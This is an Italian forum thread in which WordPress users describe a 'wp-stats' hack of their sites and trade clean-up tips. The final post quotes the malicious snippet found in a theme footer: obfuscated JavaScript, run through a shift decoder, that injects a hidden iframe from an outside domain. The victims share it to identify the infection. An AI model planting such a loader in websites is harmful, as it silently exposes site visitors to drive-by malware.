• User Attivo

    Ho subito un attacco dal "virus" wp-stats, come risolvo?

    Ciao per favore andate a visitare viva rovere punto it
    Penso di essere stato attaccato da un worm, da un bot malefico.. chiamatelo come vi pare 😢
    Fatto sta che l' interfaccia grafica si è ridotta a zero, e non possono nemmero entrare nell' admin.
    Quello che ho potuto notare, accedendo all' FTP, è che sono stati aggiunti molti file sul mio spazio web.
    ad esempio fx_admin-ajax.p
    e qui ho una prima domanda: Ho sbagliato ad impostare i permessi CHMOD?

    Vabbè, ormai il danno è subito.
    Non ho trovato informazioni su google per arrivare a una soluzione.

    Volendo aggiornare alla 2.51, per ripararare eventuali falle nella sicurezza della mia 2.3,

    ho fatto il backup di database e di tutti i file ad oggi presenti, compresi quelli "fasulli"

    Purtroppo
    non ho fatto recentemente un backup dei file del sito, quindi non riesco a capire bene quale files dovrei eliminare.

    Per completare l' aggioramento, mi manca un passaggio che non so se è davvero fondamentale: disattivare tutti i plugin. Come detto, mi è impossibile.

    Se avete un po' di pazienza, aiutatemi 😞


  • User Attivo

    Ciao, non ho mai avuto a che fare con un problema del genere, cmq ho trovato questi due articoli, spero di possano aiutare:

    wordpress.org/support/topic/151888

    jasonmorrison.net/content/2008/fixing-a-this-site-may-harm-your-computer-warning-part-2-hidden-iframes/

    fammi sapere, ciao


  • User Attivo

    Ti ringrazio bloggare, putroppo le indicazioni che vengono date da quei pos le ho già lette: rimuovere l' iframe oppure aggiornare il blog...
    ma nessuno parla di files inseriti sullo spazio web

    Io procedo, senza disattivare i plugins e non eliminando nessun "merdaceus" file


  • User Attivo

    risolto, ma ti pareva... non era mica la banale cosa che è successa a tutti.Ho dovuto fare da solo, un intero pomeriggio, passando per db e altre cose più grande di me. Una cosa l' ho imparata: backup e aggiornamenti, sempre, comunque, dovunque. Quantunque?


  • User

    @pluginguy said:

    risolto, ma ti pareva... non era mica la banale cosa che è successa a tutti.Ho dovuto fare da solo, un intero pomeriggio, passando per db e altre cose più grande di me. Una cosa l' ho imparata: backup e aggiornamenti, sempre, comunque, dovunque. Quantunque?
    io ho lo stesso tuo problema, magari se dai qualche indicazione su come risolvere L'attacco è un virus wp-stats.htm. grazie
    Siccome è la seconda volta che mi succede, sono convinta che non è sufficiente togliere i codici inseriti (come fanno poi?) ma deve esserci anche qualcosa da settare nei permessi a livello di hosting (io ho tophost)
    il mio sito infetto (calicidistelle.it) è un sitarello che ho fatto per gioco con un amico non è importante ma il mio della firma si, se dovesse succedermi anche su quello non ci dormirei. meglio prevenire che curare
    ringrazio chi mi da una mano e anche Paolino per gli interventi 1100-siti-italiani-infettati-da-malware


  • User

    ho trovato questo nel footer di un template che non usavo, ringrazio di nuovo paolino che mi ha dato la dritta.

    
    <?php get_footer(); ?><?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>
    ```:o mi sa che è lui, mi confermate?